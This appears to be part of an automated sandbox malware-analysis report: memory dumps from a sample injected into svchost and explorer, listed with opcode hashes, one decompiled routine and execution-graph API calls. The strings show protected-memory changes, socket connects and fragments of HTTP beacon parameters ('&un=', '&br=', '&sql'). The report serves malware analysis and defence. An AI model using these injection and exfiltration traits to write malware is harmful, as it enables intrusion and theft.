                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9cbfe94cda6dd4c19f3664ccbdea812349c26a894a4c75a9afce2eebf6a1570a
                                          • Instruction ID: 74301e0af5d328afdd2f84b19eeea4850851bf6bad5ec5c33cb518a90c7a4ae9
                                          • Opcode Fuzzy Hash: 9cbfe94cda6dd4c19f3664ccbdea812349c26a894a4c75a9afce2eebf6a1570a
                                          • Instruction Fuzzy Hash: 96014474A0020DAFCB00EFA8D645AAEB7F4EF58300F50445AB905EB381EB34DA00CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e0e83928ec46cf1b7fd556ce85b6edf2acf0adf23dba61fc74e1925ec095cfe
                                          • Instruction ID: 1988ad7444ea9ec5b55ee6e7812e714fa6445a6329f77aace212c04b875148ec
                                          • Opcode Fuzzy Hash: 6e0e83928ec46cf1b7fd556ce85b6edf2acf0adf23dba61fc74e1925ec095cfe
                                          • Instruction Fuzzy Hash: 73F06D75A00358EFCB04EFA9D905AAEB7F4FF18300F44406AA915EB381EA349A00CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 49e0f62fbadc8cdb115242f1f4da8f4483f8c8d609ac88bfb68ba05bee932166
                                          • Instruction ID: 5306c892fffc13b9641f29fc2078d99383edecf65f3f4d4c64f6c739525ebeac
                                          • Opcode Fuzzy Hash: 49e0f62fbadc8cdb115242f1f4da8f4483f8c8d609ac88bfb68ba05bee932166
                                          • Instruction Fuzzy Hash: FEF0B4B2997790BFD735C754C104B29BBE89B85771F4C84AFD40D87242D6A4D880C253
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction ID: a503ecf413ade13eb069221c91357ceeee59484fd35cc5f922003c34e583fb21
                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction Fuzzy Hash: 17E0ED322406006BE761EE1ADC80B13B6A9AF82B20F04407EB9001E282CAF6D80887A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f26226194722a5da40e22f6c03710ef9f8e7b9206b1d12d2ad48b4c48c007de
                                          • Instruction ID: e46e73a5a70f4632a80c05e4e63371638071582ca44b1940de5f717490b2c7ce
                                          • Opcode Fuzzy Hash: 6f26226194722a5da40e22f6c03710ef9f8e7b9206b1d12d2ad48b4c48c007de
                                          • Instruction Fuzzy Hash: 85F0A76B4152A44FDE32FB2462513D17B9DE785219B8D088BD4919B64CC9348C83DA54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a857abfd4208d2027f059c580c50fd6c8c2b5238e1ce4bef0e0893f1aa30b06a
                                          • Instruction ID: 20f8b76f8723ceafba29c1fa3a984042af2d33645d1b6cb9128a51932b1f4872
                                          • Opcode Fuzzy Hash: a857abfd4208d2027f059c580c50fd6c8c2b5238e1ce4bef0e0893f1aa30b06a
                                          • Instruction Fuzzy Hash: C6F0B474A047089FCB04EFB8D541A6EB7B8EF14300F50809AF905EB380EA38D900CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 787f08f652a97152bd01598f30e271ea2733aa296c8d1f6ed99f3084f2d1f962
                                          • Instruction ID: 757d6bc2d9017957c6a563cd3cb9eb89aa138bcf17c4a2b9f7687a992817273d
                                          • Opcode Fuzzy Hash: 787f08f652a97152bd01598f30e271ea2733aa296c8d1f6ed99f3084f2d1f962
                                          • Instruction Fuzzy Hash: E7F082B4A14258AFDB00EBA8DA06E7EB3B8EF04300F44045ABA15DF3C0EB34D900C794
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a7483e55f74211a6a06a261110afbadd7c8da3d25a24ffdd5e1367984e790d2
                                          • Instruction ID: e44342955dde14d4a05c71ebfceade0117a601ad18fb68875f0cf455b7474574
                                          • Opcode Fuzzy Hash: 6a7483e55f74211a6a06a261110afbadd7c8da3d25a24ffdd5e1367984e790d2
                                          • Instruction Fuzzy Hash: 1AF0E236522794AFD771E71CC248B23B7ECAB047BCF0844BBD4058BA20C724EC48C680
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cdcb18fb0f63d50e2acc458929effcbab7ca54938da6601168885522a9eec9b7
                                          • Instruction ID: ebf7465a985371e8ae83d4974284ab655a5cf31d3d06674aa0ef8716eee4105e
                                          • Opcode Fuzzy Hash: cdcb18fb0f63d50e2acc458929effcbab7ca54938da6601168885522a9eec9b7
                                          • Instruction Fuzzy Hash: 33F089759046489FDB04DBA9D945D6E77B8EF54200F54015AF515EB3C0EA34D900C754
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b7217910af3fa6bd97f55fbc78a0ed8f74566b527d00c183a4c26c24a9daa1f1
                                          • Instruction ID: fe8da005253560fe336f2bec2e138c0af006b060dbfe76d539f3219c30d173d2
                                          • Opcode Fuzzy Hash: b7217910af3fa6bd97f55fbc78a0ed8f74566b527d00c183a4c26c24a9daa1f1
                                          • Instruction Fuzzy Hash: 40F0E9389002C5AECF11DB68E540F79BB71AF94354F48056BD8F1AB260E736D801C785
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e433862218b1492e8583b81f0d7113e26af4d68772e23eb1ba5e8f8b7cbab35f
                                          • Instruction ID: ea70306727462e7ca7e9f388d9852c21267073109dc09fcff2babaf835c1c740
                                          • Opcode Fuzzy Hash: e433862218b1492e8583b81f0d7113e26af4d68772e23eb1ba5e8f8b7cbab35f
                                          • Instruction Fuzzy Hash: D4E092B2B01421AFD2129B58BC00F67B3ADEBE4A51F09813AF904CB214DA38DD01C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction ID: a39fc28f0c6c737c4e2487f282fe8aec8276c93564ef62c44f6ed47cc80f25ba
                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction Fuzzy Hash: FEE0D836A41228FFDB21E7DD9E05F5AFFBCDB48A60F040156B904DB150D5749D00C2D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          Uniqueness

                                          Uniqueness Score: -1.00%


                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6441f7b6a86e2bb1007b8082db21182f5f5653647193909ade7cb64d43e7ede7
                                          • Instruction ID: bcd99209f8660f0ff19debab996bd1d48adf558db4b5b8cf936fe7fc518c609a
                                          • Opcode Fuzzy Hash: 6441f7b6a86e2bb1007b8082db21182f5f5653647193909ade7cb64d43e7ede7
                                          • Instruction Fuzzy Hash: EF90026160504802E140B169585C70610159BD0241F51D012A0015554DC7998A5576F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb4127e4003f2402c670be022adefb2a513f1b5218ca3e758e25a26398b4e5d1
                                          • Instruction ID: c6c2bedf4c55b4dd6e7e7422e18cc28522d45a227a00b353fa2c578c707d2f2b
                                          • Opcode Fuzzy Hash: cb4127e4003f2402c670be022adefb2a513f1b5218ca3e758e25a26398b4e5d1
                                          • Instruction Fuzzy Hash: 9E90027130104452A500E6A95C48A4A51059BF0341B51D016A4005554C869488616171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c37453b249a2008031278b8186d6339c69129c8bac17334a4581fb7454b73b9
                                          • Instruction ID: 0303879f81bd560580627f4981e87a5d9f5e6aae144821400bd3ea1f5c2265f1
                                          • Opcode Fuzzy Hash: 3c37453b249a2008031278b8186d6339c69129c8bac17334a4581fb7454b73b9
                                          • Instruction Fuzzy Hash: D490027120104803E100A169594C70710059BD0241F51D412A0415558DD79688517171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eb4e11747f8bb6cb30979b84ee4fde638f5d28ed5d82cf3dc45d1459526adacf
                                          • Instruction ID: a16543e92309e572e79ce545dea6167d15692be5b3f0bf91de30c33d08006999
                                          • Opcode Fuzzy Hash: eb4e11747f8bb6cb30979b84ee4fde638f5d28ed5d82cf3dc45d1459526adacf
                                          • Instruction Fuzzy Hash: 7A90026120508842E100A569584CA0610059BD0245F51D012A1055595DC7758851B171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 412bf472b7d62ca849afd19f04ae523ddc34cea5a2c3774a1827d30c6f18e5d9
                                          • Instruction ID: 10a36bfffe732cc25f4bf23cb0a7c87a1e6cf7f341130e7428bff04ad049691d
                                          • Opcode Fuzzy Hash: 412bf472b7d62ca849afd19f04ae523ddc34cea5a2c3774a1827d30c6f18e5d9
                                          • Instruction Fuzzy Hash: ED90027520508842E500A5695C48A8710059BD0345F51D412A041559CD87948861B171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82622223433b67fce28f4c033bf12a47ddb3d44c5eb65a59c9cdaa71dc9754ae
                                          • Instruction ID: 6ff9a4705a91f3839911f737f38d9dd811fbaf85ed41eb05eb16ec106d33f042
                                          • Opcode Fuzzy Hash: 82622223433b67fce28f4c033bf12a47ddb3d44c5eb65a59c9cdaa71dc9754ae
                                          • Instruction Fuzzy Hash: 5E90027120104C42E100A1694848B4610059BE0341F51C017A0115654D8755C8517571
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2520134985e488057dd23f46cf02852e1da7293e18b0fcb7b23f3bc7782f0853
                                          • Instruction ID: 5c135866b855b091c1143838d55e60bbcb98d066ce69f2508eff8c73fa40c93f
                                          • Opcode Fuzzy Hash: 2520134985e488057dd23f46cf02852e1da7293e18b0fcb7b23f3bc7782f0853
                                          • Instruction Fuzzy Hash: 5D90027160504C02E150B169485874610059BD0341F51C012A0015654D87958A5576F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e44633f42fcdd6a4de9db0c8784d91024bcae3f438ad9aaf330290cb4cde492
                                          • Instruction ID: 48497deafb2b1905aadacf880c48d9ddb83953f91b294848b700f0a41c9db37b
                                          • Opcode Fuzzy Hash: 5e44633f42fcdd6a4de9db0c8784d91024bcae3f438ad9aaf330290cb4cde492
                                          • Instruction Fuzzy Hash: E290027120508C42E140B1694848A4610159BD0345F51C012A0055694D97658D55B6B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8342da5f29ff071be7025437b41679673e4b9224d392ac016f292028dbb17de
                                          • Instruction ID: f4cddcbe4791223df93f826f5f08a7cfd7edb3b890e29921fc90e3dbaae6cf12
                                          • Opcode Fuzzy Hash: f8342da5f29ff071be7025437b41679673e4b9224d392ac016f292028dbb17de
                                          • Instruction Fuzzy Hash: C390027120104C02E104A1694C4868610059BD0341F51C012A6015655E97A588917171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a11647c61db32eb5446418afaf9b4af8bd83cbaf99ab1654e094ba3286c10cb
                                          • Instruction ID: 54c7708647574ef9035ca0c71c5b098243b6d0b0258f4057ec4bb1eec4b6a1a5
                                          • Opcode Fuzzy Hash: 5a11647c61db32eb5446418afaf9b4af8bd83cbaf99ab1654e094ba3286c10cb
                                          • Instruction Fuzzy Hash: 769002E1201184925500E2698848B0A55059BE0241B51C017E1045560CC6658851A175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8adeaf3c23e19ae78a1fb444326797db43d6f23065316fa589705b0a1e398f14
                                          • Instruction ID: 68b153db91d1b2a4d3bdad9687d4f3753fb80617a6a57b38bd442975e51db447
                                          • Opcode Fuzzy Hash: 8adeaf3c23e19ae78a1fb444326797db43d6f23065316fa589705b0a1e398f14
                                          • Instruction Fuzzy Hash: 48900271A0504412A140B1694C586465006ABE0781B55C012A0505554C8A948A5563F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c476c2ec71882eae65c7327f9752b9933331a5422e6aa8672219b7f6ca39d8af
                                          • Instruction ID: 646b1c0c16456c702ca5741cd99e3745f1e8a5b82328c486c4373be1db519a30
                                          • Opcode Fuzzy Hash: c476c2ec71882eae65c7327f9752b9933331a5422e6aa8672219b7f6ca39d8af
                                          • Instruction Fuzzy Hash: D4900265221044021145E5690A4850B1445ABD6391391C016F1407590CC76188656371
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 62e131053f4e80967e378ebabb360d6f5250f32fa291e0b485be7a4cb643aaff
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E03ABFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                          				void* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t13;
                                          				intOrPtr _t14;
                                          				intOrPtr* _t15;
                                          
                                          				_t13 = __edx;
                                          				_push(_a4);
                                          				_t14 =  *[fs:0x18];
                                          				_t15 = _t12;
                                          				_t7 = E03A6CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                          				_push(_t13);
                                          				E03AB5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                          				_t9 =  *_t15;
                                          				if(_t9 == 0xffffffff) {
                                          					_t10 = 0;
                                          				} else {
                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                          				}
                                          				_push(_t10);
                                          				_push(_t15);
                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                          				return E03AB5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                          			}

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03ABFDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03ABFE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03ABFE01
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 8c234fc9c07d516d75c7599d19e282778e14fca37d09166cd029fb5c16fd4be4
                                          • Instruction ID: a4843125a9ce4946c374dc1e76af55a1342276d23a806ab14c9c45447ecf41d8
                                          • Opcode Fuzzy Hash: 8c234fc9c07d516d75c7599d19e282778e14fca37d09166cd029fb5c16fd4be4
                                          • Instruction Fuzzy Hash: 03F028366002007FD6205A45CC01F63BB6EEB41730F140216F624495D2D962F87082A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:4.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:4.6%
                                          Total number of Nodes:457
                                          Total number of Limit Nodes:17
6971->6966 6973 75498f2 NtProtectVirtualMemory 6972->6973 6974 754d597 6972->6974 6973->6974 6975 75498f2 NtProtectVirtualMemory 6974->6975 6976 754d5bf 6974->6976 6975->6976 6980 75498f2 NtProtectVirtualMemory 6976->6980 6981 754d6b9 6976->6981 6977 754d6e1 6978 7550382 2 API calls 6977->6978 6979 754d6e9 6978->6979 6979->6918 6980->6981 6981->6977 6982 75498f2 NtProtectVirtualMemory 6981->6982 6982->6977 6984 754d767 6983->6984 6985 75498f2 NtProtectVirtualMemory 6984->6985 6990 754d903 6984->6990 6986 754d8e3 6985->6986 6987 75498f2 NtProtectVirtualMemory 6986->6987 6987->6990 6988 754d9b7 6989 7550382 2 API calls 6988->6989 6993 754d9bf 6989->6993 6991 75498f2 NtProtectVirtualMemory 6990->6991 6992 754d992 6990->6992 6991->6992 6992->6988 6994 75498f2 NtProtectVirtualMemory 6992->6994 6993->6918 6994->6988 6996 7549987 6995->6996 6999 75499b2 6996->6999 7010 754a622 6996->7010 6998 7549c0c 6998->6927 6999->6998 7000 7549ba2 6999->7000 7002 7549ac5 6999->7002 7001 7555e12 NtProtectVirtualMemory 7000->7001 7009 7549b5b 7001->7009 7014 7555e12 7002->7014 7004 7555e12 NtProtectVirtualMemory 7004->6998 7005 7549ae3 7005->6998 7006 7549b3d 7005->7006 7007 7555e12 NtProtectVirtualMemory 7005->7007 7008 7555e12 NtProtectVirtualMemory 7006->7008 7007->7006 7008->7009 7009->6998 7009->7004 7012 754a67a 7010->7012 7011 754a684 7011->6999 7012->7011 7013 7555e12 NtProtectVirtualMemory 7012->7013 7013->7012 7015 7554942 7014->7015 7016 7555e45 NtProtectVirtualMemory 7015->7016 7017 7555e70 7016->7017 7017->7005 7019 75503c7 7018->7019 7024 7550232 7019->7024 7021 7550438 7028 7551632 7021->7028 7023 7550e7b 7023->6934 7025 755025e 7024->7025 7031 754f8c2 7025->7031 7027 755026b 7027->7021 7029 755166d 7028->7029 7030 755168b WSAStartup 7028->7030 7029->7030 7030->7023 7032 754f934 7031->7032 7033 754f9a6 7032->7033 7034 754f995 ObtainUserAgentString 7032->7034 7033->7027 7034->7033 7114 755162c 7115 755166d 7114->7115 7116 755168b WSAStartup 7114->7116 7115->7116 7117 
754a42e 7118 754a45b 7117->7118 7126 754a4c9 7117->7126 7119 7554232 NtCreateFile 7118->7119 7118->7126 7120 754a496 7119->7120 7121 754a4c5 7120->7121 7122 754a082 NtCreateFile 7120->7122 7123 7554232 NtCreateFile 7121->7123 7121->7126 7124 754a4b6 7122->7124 7123->7126 7124->7121 7125 7549f52 NtCreateFile 7124->7125 7125->7121 7127 755172e 7128 7551788 connect 7127->7128 7129 755176a 7127->7129 7129->7128 7263 7556aa9 7264 7556aaf 7263->7264 7267 7551212 7264->7267 7266 7556ac7 7268 7551237 7267->7268 7269 755121b 7267->7269 7268->7266 7269->7268 7270 75510c2 6 API calls 7269->7270 7270->7268 7130 755022a 7131 755025e 7130->7131 7132 754f8c2 ObtainUserAgentString 7131->7132 7133 755026b 7132->7133

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: getaddrinforecvsetsockopt
                                          • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                          • API String ID: 1564272048-1117930895
                                          • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction ID: 7c40743ab1130ec04606f070be4a55e4fa6a80a2bfff77a679a84f979f4ff2b2
                                          • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction Fuzzy Hash: 605292B0614A498FDB29EF68C4A47E9B7E2FB94300F50462FD89FC7142EE30A555CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: `
                                          • API String ID: 823142352-2679148245
                                          • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction ID: ecdfeee772c816eef9e1b91e3b31c589528bfa61a183b13a4634c5b62c401476
                                          • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction Fuzzy Hash: 2E223DB0A18A4E9FCB59DF28C4956EAF7E1FB98301F41462FD85ED3250DB30A591CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 453 7555e12-7555e6e call 7554942 NtProtectVirtualMemory 456 7555e70-7555e7c 453->456 457 7555e7d-7555e8f 453->457
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 07555E67
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
